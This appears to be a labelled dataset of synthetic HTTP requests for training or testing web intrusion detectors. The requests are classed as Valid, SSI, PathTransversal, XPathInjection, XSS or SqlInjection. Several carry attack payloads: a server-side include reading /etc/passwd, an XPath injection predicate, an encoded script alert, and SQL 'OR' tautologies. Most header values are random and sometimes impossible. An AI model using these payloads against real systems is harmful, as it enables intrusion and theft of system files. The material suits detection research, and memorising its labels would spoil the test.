GET /4x8eq.s/x_mmSrSLE@7Q/fromv6Sisz/tnJS3kJ4auL@l/edXd-sxL3omInC/lnEofmtHttmta2e/onnubttee4ssn/e8Os.php3?a4cYemilteth=dbody7&lDjN=agattnhtty0m8aG5 HTTP/1.1
Host: 216.87.130.14:4095
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 80.103.55.142
Cookie: s3a3hddhNstUcpE=opt(cu;a41iyp=880593513;66b=50;oerjii=Nnb8hoe k;ta3mn4twxa=26235
Cookie2: $Version="01"
Date: Tue, 10 Oct 06 08:32:42 CET
ETag: W/"1gX9YQdgjmVgQfs"
Expect: nAkim7dd
From: oBcae9t@txO3eond.biz
If-Modified-Since: Thu, 17 Sep 09 11:51:21 UTC
If-Unmodified-Since: Sun, 06 Mar 05 12:23:54 GMT
If-Match: *
If-None-Match: "Qv076dnHwnaiAZIw@Q"
If-Range: Sat, 22 Dec 07 24:39:23 UTC
Max-Forwards: 36
MIME-Version: 6.3
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Digest nonce
Range: 9246-,43437-,-51100
Referer: http://www.Hxmel.de/iatpc5/nblsrnd/ncao0eD.pl
TE: gzip;q=0.4
Trailer: If-Range
User-Agent: esEysie (hp.33dURZ; aE7bIResp; u-z01KjQ; srgb2mNcW)
UA-CPU: PowerPC
UA-Disp: 243,084,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 6329x3487
Via: 1.4 www.eaty2w.html, HTTP/9.7 www.Sodkzny.png, 14gina/3.8 www.iace.jpg
Transfer-Encoding: deflate
Upgrade: fioa/5.4, weeo/7.8, l0s/3.4, srerh/3.7
Warning: 999 www.inZhH.jpeg:2 "ret1" 
X-Forwarded-For: 7.153.57.18
X-Serial-Number: 15983235
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28421
Start - Id: 10135
class: Valid
GET /1cI2/iW/tueh/isXHy.php?Abretsbrea=s%3D1processing-instructionechtacces4n&vhEbqU=plGc1%40w.RH HTTP/1.1
Host: 223.172.198.219:10
Connection: ptcnti
Accept: */*;q=0.4
Accept-Charset: *;q=0.8
Accept-Encoding: *;q=0.1
Accept-Language: hxbwnfe-el;q=0.4, ute-m6sRhP7;q=0.7, 5hotatos-nmdsta, Lnw-ssba;q=0.7
Cache-Control: no-store
Client-ip: 42.207.99.95
Cookie: tiaiwXeehYnhaCh=e
Cookie2: $Version="9"
Date: Tue, 05 Jan 10 20:17:14 GMT
ETag: W/"ZNPeIbuyDuWoq.Gflf"
Expect: jpgrt=9vdtd;nsh5uen=mOEto
From: tooao@trne6cted.it
If-Modified-Since: Wed, 26 Aug 09 03:50:59 CET
If-Unmodified-Since: Wed, 30 Jan 08 09:20:52 CET
If-Match: *
If-None-Match: "vdxNEsMSfJfyUJKC"
If-Range: "roj1qj-mpKZ6FD.uJ8t"
Max-Forwards: 4870
MIME-Version: 0.7
Pragma: no-cache
Proxy-Authorization: irimMo rnefpib=0rSnos
Authorization: Digest qop=auth-int
Range: 374825-,-184
Referer: http://6rOmo.fr/a8d2Aedi/bet55u/M4naihl/bslvOmaN/Urfnae.ace
TE: trailers
Trailer: Date
User-Agent: sYs8tvaR http://www.eYvborm.org
UA-CPU: x86
UA-Disp: 7262,260,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 012x3228
Via: a6ma/5.0 126.55.10.204:6, HTTP/4.4 18.3.231.91
Transfer-Encoding: identity
Upgrade: oameu/8.0, bsste/1.0
Warning: 532 www.shkroer.shtml:1701 "enin" "Sat, 30 Apr 05 12:33:33 UTC"
X-Forwarded-For: 175.87.104.128
X-Serial-Number: 42090054187399989
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10135
Start - Id: 39859
class: SSI
POST /22U3_hfy6.B17hg/cH/nZGecUL8h@fZuT.jsp? HTTP/1.0
Content-Length: 170
Content-Language: annteyc,txOo
Content-Encoding: gzip
Content-Location: http://www.qcwhrhS.ch/ouHle3/rtoa.dll
Content-MD5: bmNnZW1ldXRtc3hpc2xvaA==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Fri, 31 Mar 06 21:29:11 UTC
Host: 245.197.127.50
Connection: keep-alive
Accept: video/*, application/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: max-stale
Cookie: 7lhhKdass9d=unee;xta6ntis9etcb=t5toen1ien;qialidtvet=795;iQsyx=8;lateo=<!--     #include virtual="/etc/passwd"     -->;ehefepcceomsb=2a&:n
Cookie2: $Version="9"
Date: Thu, 11 Oct 07 19:45:43 UTC
ETag: W/"XC@_Ab00bQHXxJ78S8"
If-Modified-Since: Fri, 07 Oct 05 12:22:46 CET
If-Match: *
If-None-Match: *
Max-Forwards: 0
MIME-Version: 8.6
Referer: /cdQsiel/oaqege/8oFc/44pl/elotmil.txt
User-Agent: Mozilla/6.9 (X11; U; SunOS sun4u 1.6; ea-et; rv:3.9.2) Gecko/25635271

CcLuv=an+h&eo=065927194&2ejn=union&ne0ewl3deOoiyl=sii&ottet=twsUjB&cupdatelRK1P=540184073&8Tr1yABp7QC=733&tH=alIR6SISW0F&eey1e=7szyyte4tu&nNrlemsgttta=T&vbid5Ilzu=aDn0w

End - Id: 39859
Start - Id: 11246
class: Valid
GET /oyz4GD/rethawtnhEeiinsdbia/neotrogegh/pcGC7Fb_U3eMmaR/Yly0arxohosbmnshr.aspx?oaeliei7aogsn=+n+&Esr6gahe26h=ntTe7ugnEi5&iitns=82 HTTP/1.0
Host: www.6ihte.cz
Connection: eftet
Accept: */*;q=0.0
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: snsdieee-1;q=0.5, xWLs5kcp-7arp3so;q=0.1
Cache-Control: min-fresh=4844
Client-ip: 28.60.83.132
Cookie: 1oVlinkCO-rxn_=dtlsee;5guOugi0se=hC-RF6q8;aofyeucshli=53100;nweh0zxpI=Dtlpcbo1i2roaue;Os1nsAyea=26469;I1M.UsMphp7=iraE7ai5v7
Cookie2: $Version="954"
Date: Thu, 27 Aug 09 21:53:03 UTC
ETag: W/"xHFAHvPdU3Ym6I3Px"
Expect: Einw
From: aarli@mLmeltu.be
If-Modified-Since: Thu, 23 Feb 06 11:44:39 GMT
If-Unmodified-Since: Wed, 24 Oct 07 10:33:16 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 23 Apr 04 03:59:26 UTC
Max-Forwards: 56
MIME-Version: 7.3
Pragma: no-cache
Proxy-Authorization: Basic b2NPZWM6TExyNXR1YQ==
Authorization: dpcefH 6eO8h2se=0c7E2
Range: 04605-
Referer: /Tjia/vsi3/wrsnoa/hhpet.gif
TE: trailers
Trailer: If-None-Match
User-Agent: meertaAet4ef3en
UA-CPU: PowerPC
UA-Disp: 3041,261,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 898x128
Via: 3.2 50.162.126.178, 7.2 91.175.6.47:2, 5.5 www.eJ5sa.html
Transfer-Encoding: compress
Upgrade: ezh/4.9, hQouO/8.3, Ttomi/2.4, iind/9.4, umvntb/3.3
Warning: 482 www.nt5e.js "raopnnI2epacwex" "Sun, 04 Jan 04 12:41:28 CET"
X-Forwarded-For: 175.7.223.209
X-Serial-Number: 450563801661696804
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 11246
Start - Id: 46132
class: PathTransversal
GET /n_fA8o/4BF5kMAJBFBO4EZ/methExlaiePrf2bni8na/lDF_U%umochawget0Xkhavinga/yxMgpDiRfYwotYWwgIz5/t8eaawetthocieur.css?E@T87=mezFr-e+n&ihnt=%2Fk4t&reaMRosseahd=u%3A%2F.htaccess%7E&rotnnon=4594&ehsReyaeny=jbtUWuv2JSE&fodmo=7&qEXHxcnY6Rh=i&or=9 HTTP/1.1
Host: 235.184.110.253
Connection: keep-alive
Accept: video/quicktime;q=0.9, image/*
Accept-Charset: *;q=0.8
Accept-Encoding: *;q=0.9
Accept-Language: ne-t, e-Esttn;q=0.7
Cache-Control: only-if-cached
Client-ip: 239.180.108.4
Cookie: bjwteesotaesmQ=eh8oeidw;u2shxnapoa4aeo=%)vsa2lsPi8w;hsahee6jmnE=6838;drEaulr7sntrN=l5s(o
Cookie2: $Version="272"
Date: Mon, 28 Apr 08 13:20:30 UTC
ETag: W/"vMDloPJ7nBvdxA8cggU"
Expect: 100-continue
From: r9hecgen@ob8h.it
If-Modified-Since: Tue, 26 Jul 05 13:48:37 UTC
If-Unmodified-Since: Mon, 04 Aug 08 20:23:35 UTC
If-Match: "-huZnnzoh_ZCehf-Qbg"
If-None-Match: *
If-Range: *
Max-Forwards: 880
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: cOnr 0keiminm=fEu1eshg
Referer: http://www.Rsgus.it/Htsheae/pRbtiw/mednels/ecrqqmd/ono4sraa.doc
TE: deflate,trailers
Trailer: If-Match
User-Agent: eT1dFuYrY http://www.dadortuY.net
Via: 3.2 www.risslcp.js, 8.1 216.219.61.83
Transfer-Encoding: compress
Upgrade: 4sr0z/5.8, 5eIsba/5.8, lviujp/4.0, arJ2h/2.1, fgge/2.5
X-Serial-Number: 83931
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46132
Start - Id: 22913
class: Valid
GET /hr3s/3gel8a2r89tdn/sfrofnyrqlomeiWepjp/riJ8JLUanKrLQYXCGmx@/taewaen/p0gd3E/eyMau3CTg.html? HTTP/1.0
Host: www.cnsd2.cz:1
Connection: close
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: identity, gzip, compress;q=0.3, compress, identity
Accept-Language: hdn9s-pztdta, TwEcewen-r;q=0.0, rthChl-En2pott, i5al4ne-raeraPth;q=0.3
Cache-Control: max-age=8136
Client-ip: 238.41.42.217
Cookie: uaiseigtoptt=7;Odavut=1;m2izdHiYPohe=c0ma;soio=rs kls(6gooe$rdc
Cookie2: $Version="805"
Date: Tue, 22 Feb 05 11:43:48 CET
ETag: W/"-C7c.97u8@BA.00"
Expect: 100-continue
From: 8dmmAuhr@htieh.gov
If-Modified-Since: Sun, 05 Sep 04 23:25:41 GMT
If-Unmodified-Since: Thu, 12 Mar 09 16:47:05 GMT
If-Match: *
If-None-Match: "Gc2G2WvXPm3UgpZ"
If-Range: Thu, 25 Dec 08 05:06:25 UTC
Max-Forwards: 7
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: Basic c3RDZWVvbDpvbmxUYWF5
Authorization: Basic c3BhbjpOU3N6dFFs
Range: -6039,4724-
Referer: http://www.isnrqrhl.fr/ihtinTs.mp3
TE: gzip;q=0.8
Trailer: Accept-Encoding
User-Agent: mSasysroa
UA-CPU: x86
UA-Disp: 3881,209,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 423x053
Via: 5.1 www.82nrl8.shtml
Transfer-Encoding: deflate
Upgrade: aHpmg/5.8, 48c/5.3
Warning: 383 www.enRF.jpeg "I3teed" 
X-Forwarded-For: 26.249.21.162
X-Serial-Number: 426023548
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22913
Start - Id: 50073
class: XPathInjection
POST /yB1u6rFW_vf81O8fnh7E/nnng1Sygiei3h/eQzE_d7X.H0v5yTD.k/ukrnudle/h24d2N.p2QuQ/fYciYDeaxT/lEfe_OU.mdb? HTTP/1.1
Content-Length: 57
Content-Language: o,qzu,4sytl
Content-Encoding: deflate
Content-Location: /hy1a.mspx
Content-MD5: ZTVlY2ZBc3NsdG5uZWltbQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 28 Sep 07 06:22:53 UTC
Last-Modified: Sun, 09 Aug 09 15:23:42 UTC
Host: www.l1RhN.uk:62594
Connection: keep-alive
Accept: image/*;q=0.5, text/*;q=0.1, video/mpeg
Accept-Charset: *;q=0.2
Accept-Encoding: *
Accept-Language: leatsa0p-hahdahd;q=0.4, 1tUareas-bnmg;q=0.1, a9-eeu;q=0.1, tndHy-Opsi1uew
Cache-Control: min-fresh=243
Client-ip: 69.117.220.148
Cookie: y5mo9Dpheaaar=tig/Nuoa/o/child::node()[     position()=5]     |     hicL/gdo9/sh/child::text()[position()=17] or    'oeerberr'=  ';rz7hs= ;ZJDreplace4R=50;o98q7=da8oss;aywiqa=msft
Cookie2: $Version="8"
Date: Tue, 17 Apr 07 11:13:38 UTC
ETag: W/"OUNTwF9l.xV39@6x91pF"
Expect: tnhioTob=yrue;ujhL
From: edaaisla@oe0taiade.biz
If-Modified-Since: Fri, 22 Sep 06 18:10:19 UTC
If-Unmodified-Since: Mon, 26 Mar 07 08:51:00 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 29 Mar 08 24:01:04 CET
Max-Forwards: 8
MIME-Version: 5.6
Pragma: no-cache
Proxy-Authorization: Digest username="7btlnr"
Authorization: Digest nc=7708f34C
Range: 8-
Referer: http://saewc.com/meiei/3sfg/drgf/2etTt.asmx
TE: chunked,deflate;q=0.9
Trailer: User-Agent
User-Agent: Mozilla/1.3 (Windows; U; Win 9x 3.5; rK-e2; rv:6.4.5) Gecko/79950247
UA-CPU: MIPS
UA-Disp: 6398,9541,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 254x290
Via: 6.4 220.172.231.118
Transfer-Encoding: 4oid; nE1e=ocan
Upgrade: h7qu/9.3, emae4/9.5, 0nugh/4.3, hA8sm/7.8
Warning: 827 251.29.25.85 "odteiapo" 
X-Forwarded-For: 90.182.23.222
X-Serial-Number: 7706137339347
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

5acengyhebeg=738&-VgEVPgYO=t_23.QYutjDA&unionKoa=ran0sTde

End - Id: 50073
Start - Id: 48142
class: XSS
GET /Kc_VEAw-Mq@u/4soie5afat27kreehdeh/ouF4bx0AuywDAxRVh/hld8omweah.bin?oLadminzV1im=%3Cscript%3Ealert+%28treLtfrqing.luemuh%29%3C%2Fscript++++%3E&foGeoTeae=ropZ HTTP/1.0
Host: www.oepiih.com
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: windows-1251;q=0.7, windows-1253, cp-932;q=0.7
Accept-Encoding: *;q=0.2
Accept-Language: deoe7-wt4;q=0.5, indrR7e-oei9oe, r-ls8;q=0.1, euf-S3wc
Cache-Control: max-stale=453
Client-ip: 103.19.58.154
Cookie: e2vlasnHj= C;ni=z taqlh7hmnh
Cookie2: $Version="618"
Date: Sat, 11 Apr 09 17:51:25 UTC
ETag: W/"S@DgpQP0LDLui7Q_3Tm"
Expect: fh2IAlI=egbfsrrd
From: terhoe3@ygfzae.st
If-Modified-Since: Mon, 03 Sep 07 02:10:43 GMT
If-Unmodified-Since: Tue, 25 Apr 06 23:49:44 UTC
If-Match: "ptu_FXdvI_CfDeC_kxZ"
If-None-Match: *
If-Range: *
Max-Forwards: 58
MIME-Version: 8.0
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: iteOs shsTayq=nesE
Range: -54
Referer: http://www.pnyel.be/iuicl/deisEum.gz
TE: trailers,deflate;q=0.1,trailers
Trailer: Trailer
User-Agent: h5eooiaetpo
UA-CPU: Sparc
UA-Disp: 121,8495,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 8071x836
Via: HTTP/0.7 22.174.38.211
Transfer-Encoding: gzip
Upgrade: ahrnb/9.3, dedEnm/2.8, Knaee1/4.9, betzh/8.1, EaMe1a/1.8
Warning: 934 182.60.171.172 "mrhrn7etePlbs" 
X-Forwarded-For: 112.65.225.240
----: --------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 48142
Start - Id: 23427
class: Valid
GET /odnh/Mcat5sl-4httpcopy8/uxqnZdYXM5T@qc/8KyCy8pVt6crmRq1T/s0heuidhTM3rw/replace9gAbIYkVXdeleteac/e.P0V-tbZ-Ox7axr_y/hfel0/bovtnueonLhercg9aet/oKblFzBwqp/elmindotltmhvI/izthss.jsp?atNuLsiT=ut.vv1EZm&enttSwahhpx=ihreD&NFr=mqoscmeoucai&wtswseerainnnfn=eaewdropeattpassthru&waed2emiltdcroo=abtmmas&mdhdajfde=es0tH&rbnvuaoprqpe=+i&7Rfm=c+if%28mA%3Ffall%7E%7Eiiaees&ia=06&u1ikOPF=70%3CivvZtoifrh0r&hanblaefosnidT=nlfj+&nulliechoti1L=4%407fY&rmwRy=qi%29e%5Cktuetjgaots0 HTTP/1.0
Host: www.erNtn2rCwd.de
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: *;q=0.6
Accept-Encoding: deflate;q=0.2, identity, compress, compress, compress;q=0.9
Accept-Language: *;q=0.2
Cache-Control: no-store
Client-ip: 206.97.201.33
Cookie: tzihna=r0U-;bnalncr65dke=n;aratcuoh=iA2.wv;8ltmonlEur=rincludeTr ;teeLAst=nd]?bbin(l0N]de connectkgroup by&l
Cookie2: $Version="4"
Date: Fri, 20 Mar 09 09:03:06 GMT
ETag: W/"8vLj49fQoe.ZINRZqca1"
Expect: lrsmoPb
From: i1ejual@Eudncoe.st
If-Modified-Since: Tue, 31 Jul 07 12:29:22 UTC
If-Unmodified-Since: Sat, 27 Jan 07 14:11:23 CET
If-Match: *
If-None-Match: "RMSea@L5kLonAJFzyn"
If-Range: Thu, 13 May 04 16:33:44 GMT
Max-Forwards: 466
MIME-Version: 6.6
Pragma: no-cache
Proxy-Authorization: Basic dGFpaGNvOm82em0=
Authorization: nent hImn=seKserA
Range: -93638
Referer: http://www.hdfYdsfO.org/ataisn/eedogIsb/raFmt/efiTseme.mpg
TE: chunked;q=0.8
Trailer: Via
User-Agent: 86E-3WWjhZ http://www.he4cle.uk
UA-CPU: PowerPC
UA-Disp: 528,388,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 5603x6061
Via: FTP/6.4 www.iea5ttsm.png
Transfer-Encoding: compress
Upgrade: ewen/9.0, yzsq/2.6, dee/3.9
Warning: 236 157.67.24.128 "gsto" 
X-Forwarded-For: 247.130.186.48
X-Serial-Number: 15233843
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23427
Start - Id: 22117
class: Valid
GET /iahtedeatnoduesenaT/ljhcsezrpeEz5ossblps/xG_SLGGaLxlNmF/hhfswiratolzittit.mspx?fitalEn6ezenni=objectth%24&iidn=leeli0heRnr HTTP/1.1
Host: 147.83.119.44
Connection: close
Accept: text/xml;q=0.5, image/*;q=0.7
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-cache
Client-ip: 204.187.68.18
Cookie: asuS=20;HeavJ=tlD
Cookie2: $Version="515"
Date: Mon, 05 Jul 04 17:48:56 UTC
ETag: "Eo5FYzDFb7Xyw5IhtlZO"
Expect: 100-continue
From: ers7@stiihe.com
If-Modified-Since: Sun, 14 Aug 05 10:30:19 GMT
If-Unmodified-Since: Sat, 26 Nov 05 05:04:55 CET
If-Match: *
If-None-Match: *
If-Range: "Mp4wz35w-47kZLGT"
Max-Forwards: 8
MIME-Version: 1.6
Pragma: ieut=o9ps4
Proxy-Authorization: iad9E rrbbtd=umT68
Authorization: gtsru ohiiOQ=eo5xye
Range: 1976-
Referer: http://pnhnmhc.net/s3fAra/shn4/ocag.txt
TE: trailers,chunked;q=0.0
Trailer: Range
User-Agent: Mozilla/7.3 (Machintosh; U; PPC 0.5; er-1u; rv:5.2.9) Gecko/52885244
UA-CPU: x86
UA-Disp: 2956,8446,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 8724x0388
Via: 9.7 www.vsaSi.css
Transfer-Encoding: identity
Upgrade: nistro/9.0, m14h/4.7
Warning: 536 162.78.197.155:33480 "iebaetgd" "Tue, 25 Oct 05 10:31:53 GMT"
X-Forwarded-For: 150.191.145.37
X-Serial-Number: 42920569636252963929
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22117
Start - Id: 42423
class: SqlInjection
GET /locationDnU/daOumQ7/lKuSW8/Me/eesao/Eaeti7sodhsae/auneilfgt/on/h2sFFTufcYW-BmXY1.html?Whkipyn41=5&1bbnttmeeb83oc8=m2neai&ssarOhhooyue=e%5D&sll=OrigText%27OR%27TamEir%27++%3D++++%276n%27&WQEETbr1pe=1810331&dmfhtnsrs=eH&tmEsrvdj4eAeu4=6xetehm4enshemnr&cofuda=hoiexec+eessLdid&lJe=ipeviVsrehennwr&3shueeoeaD=-aOi HTTP/1.0
Host: www.mrjeidd.biz
Connection: keep-alive
Accept: application/rtf;q=0.2
Accept-Charset: *
Accept-Encoding: 
Accept-Language: ayhvDnn-inza, 1gce3nc-q;q=0.5, atMis1Nh-EHedau3;q=0.0
Cache-Control: oeen='AflmweD'
Client-ip: 28.141.41.185
Cookie: hl=d2wteffl;9XP@M2J@cconnectW=oiyab;areh=Eenwn2zwsnrtwhsni
Cookie2: $Version="157"
Date: Thu, 15 Dec 05 01:49:07 CET
ETag: W/"ROs81ENXsNKrraDFF"
Expect: epanbff
From: Tm9x@je4xi.it
If-Modified-Since: Tue, 16 Jan 07 09:12:31 GMT
If-Unmodified-Since: Tue, 30 Mar 04 08:10:04 GMT
If-Match: "DyIdS6qC79jRQ49jY"
If-None-Match: "pNN1.vyaxQzf9kZ"
If-Range: Tue, 22 Feb 05 21:12:15 UTC
Max-Forwards: 21
MIME-Version: 0.1
Pragma: ttExI=sunRi
Proxy-Authorization: Basic aHdkZWQ6dDVtbjYzb1M=
Authorization: Digest nonce
Range: 005696-6624,4-
Referer: /fosion/fgwdao/c9i38bI/utncoeN/ZhrSutt.txt
TE: gzip;q=0.6,trailers
Trailer: Trailer
User-Agent: i2Isbhi http://www.iEoa.it
UA-CPU: 68000
UA-Disp: 4009,500,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 189x646
Via: HTTP/6.0 www.reH4ok.png
Transfer-Encoding: compress
Upgrade: 3w4vo/5.2, oee9/2.0, ot6Q/5.5, ergojg/6.9, u2osoe/4.9
Warning: 781 102.8.11.215 "Yhee38R7lileIanstkb" 
X-Forwarded-For: 120.46.59.231
X-Serial-Number: 2317427
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 42423
Start - Id: 18901
class: Valid
GET /dltadooesseta/aMJ_OIkum47D-_H0B/lJLLORgSh64hQ2ktb.png? HTTP/1.1
Host: 243.88.183.232:70130
Connection: close
Accept: text/plain, audio/x-wav, video/mpeg;q=0.1
Accept-Charset: x-mac-arabic;q=0.3, windows-1255
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 224.237.10.98
Cookie: diog= ;nq=20918699;0WMPdL=w@pUtCL7p;bayoetr4atsftir=867175;oh=~M%ut4e9oeYhmlpLineEs
Cookie2: $Version="0"
Date: Mon, 07 Feb 05 03:47:50 GMT
ETag: "deBxNwTS1X6PPnyQ9o8e"
Expect: 100-continue
From: sAoSt@vajrs.st
If-Modified-Since: Mon, 07 Dec 09 10:14:21 CET
If-Unmodified-Since: Sun, 22 Aug 04 12:18:09 UTC
If-Match: "b0EWbeY@VD@hvA1"
If-None-Match: "Fij0PQEIUe.OVaqt8ZG"
If-Range: *
Max-Forwards: 16
MIME-Version: 9.7
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Basic aWVJMGN0OnNldG9k
Range: 14-63534,8995-18,3-83
Referer: /5eml/aaa3nr/m3eEvnb.php3
TE: deflate;q=0.6,gzip
Trailer: Max-Forwards
User-Agent: Mozilla/8.1 (compatible; MSIE 4.9; Open BSD i386; ydnzunns; migocNuo)
UA-CPU: MIPS
UA-Disp: 708,1125,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 905x897
Via: HTTP/0.5 www.2aoo.js:96098, 6.4 219.199.105.67
Transfer-Encoding: compress
Upgrade: nash0s/1.5, Xiiie/7.6
Warning: 226 www.njsira.shtml "3eahntvtanuw" 
X-Forwarded-For: 180.173.9.202
X-Serial-Number: 463833630
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 18901
Start - Id: 42346
class: SqlInjection
GET /1P@Fxj@FqApEvl/mHc/cqfK1.php4?3hit=9064&ZQtelneta2eJ=470&bueowiaskus=18664&na6ejnq=jta%3Fia908miFeiO&ezurph=%27+++OR+++%27eaqhu1oa%27++++%3D++++N%27++++&mpcitilmctc5Le=581358&ddaden=7854&nueleoaeroo=s%40K&ZuadthTasevbcoE=tBrfreplace&hehznrve=tootf5csei%7CwgAhto HTTP/1.1
Host: www.nEsknaa.it
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.0
Accept-Language: aOoago-sbsbiaB
Cache-Control: no-store
Client-ip: 234.69.56.127
Cookie: iikaiyol8=ouye;EaVtw6rryn= qbe
Cookie2: $Version="85"
Date: Thu, 19 Oct 06 23:19:29 GMT
ETag: "OVVBmY_Rb3C9MGri_gO"
Expect: 2umiebtT=nsiyaDcL;shjh=2fwn
From: 9quNt@ct6Iewpcw4.cz
If-Modified-Since: Tue, 14 Oct 08 10:18:52 GMT
If-Unmodified-Since: Tue, 14 Oct 08 22:14:54 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 09 Jul 08 24:27:17 UTC
Max-Forwards: 105
MIME-Version: 5.2
Pragma: no-cache
Proxy-Authorization: Digest cnonce="t3iwsaih"
Authorization: f7fern itir=ILPswT
Range: -42018,-510767
Referer: http://tiokfheg.de/3Dss.jpg
TE: chunked;q=0.8,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/6.8 (compatible; t51naie; Solaris; dtym; eyhdc; Il88tmkni)
UA-CPU: x86
UA-Disp: 695,8049,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 999x243
Via: 5.6 www.ne60Iht.tiff
Transfer-Encoding: identity
Upgrade: aia9y/5.8, shfr/4.4, ssoa/6.4
Warning: 478 44.68.67.163:8 "haHdehmpgh" 
X-Forwarded-For: 171.143.1.2
X-Serial-Number: 71261
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42346
Start - Id: 8763
class: Valid
GET /fsa/UnnedF5ee3dmNdp3eire/88Tx4.replacekoA/hu6n/wlhdp/ogyLf899Csv0.swf?fiNut=ddjifycsEb&alwge2dos=977&ph7aoart=htpassh8&Se4e=946&otcoowebSeituad=o%28+r%7Cf&rhwrnpe6ynuNHb=939627786&PXyo7PgScdivMj=a2a3em&IeeaonofaGb=tcehtt&MxaUformRwinntH-Sx=7480537&cae=78542597 HTTP/1.0
Host: 71.181.169.191
Connection: keep-alive
Accept: image/*, image/jpeg;q=0.5
Accept-Charset: x-mac-cyrillic;q=0.8
Accept-Encoding: 
Accept-Language: inffsda-l4xj;q=0.6, aDO7-lsnAotlg;q=0.6, iZmpor-drF69;q=0.6, 5ntoA-ouondara, soM9-6ytqtdel;q=0.1
Cache-Control: only-if-cached
Client-ip: 176.247.52.54
Cookie: AouFts=7e8nr;rof2rhcrsu67=enzeeval;MzKrI_.=43;tte1t7rnoiodaa=oT6;rSuhrqei= tei;u4dN=inWPad
Cookie2: $Version="149"
Date: Sat, 22 Mar 08 21:34:44 GMT
ETag: W/"mN-q7y62RCi4Ex1"
Expect: ieva6mn=Heaex
From: xrVtdi5@b55e.cz
If-Modified-Since: Thu, 28 Sep 06 14:18:37 CET
If-Unmodified-Since: Sun, 06 Nov 05 16:10:59 GMT
If-Match: "oWU6qwCtHkiQgKnDEzU"
If-None-Match: *
If-Range: Mon, 12 Jan 09 17:16:34 UTC
Max-Forwards: 1150
MIME-Version: 8.3
Pragma: tGHtr=a
Proxy-Authorization: Basic OWVxbjplZUJBaA==
Authorization: Basic R2ltZDpndHRh
Range: -914608,-7
Referer: http://www.gqT7n.cz/Otub/mttbm.zip
TE: trailers,chunked,gzip
Trailer: Trailer
User-Agent: iedetakhae (n8ntEHtzP1)
UA-CPU: Sparc
UA-Disp: 608,0739,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 3952x6692
Via: 0.0 240.74.172.242
Transfer-Encoding: compress
Upgrade: ilBn/8.6
Warning: 642 69.235.0.195:2770 "RaqtwI1" "Tue, 27 Jul 04 11:32:37 GMT"
X-Forwarded-For: 192.166.39.83
X-Serial-Number: 14852095010495286519
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8763
Start - Id: 44
class: Valid
GET /itRZ/ifETmkvsUADz9.QmCc/litee87snlindeiiAr/ouxSyJydEji3vMYZP41r/_N%uf/bjX_QUt/r41naofesawrefseu/9vL_rtywgethS53RL/lu1rdoa/nurs7.mdb?veju9kda=b-4S%409l%40JWh&3x5y=Rboot.ini&xneeAddcr=osooetcGn HTTP/1.1
Host: www.dewoiN.gov:80
Connection: dt7p6tad
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate, gzip
Accept-Language: *
Cache-Control: tngaxet='5mtaNoem'
Client-ip: 138.17.45.182
Cookie: taddrOcxytsetD=803;ysoUeSi=94057
Cookie2: $Version="888"
Date: Sun, 22 Jun 08 01:58:15 UTC
ETag: W/"txendMFnsxCj7AS8"
Expect: aidtLni=bldl;eae9qt=t0sstn
From: nfosysn@ettlan.fr
If-Modified-Since: Sun, 03 Aug 08 16:40:35 CET
If-Unmodified-Since: Sun, 25 Feb 07 20:22:59 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 17 Mar 10 01:19:41 UTC
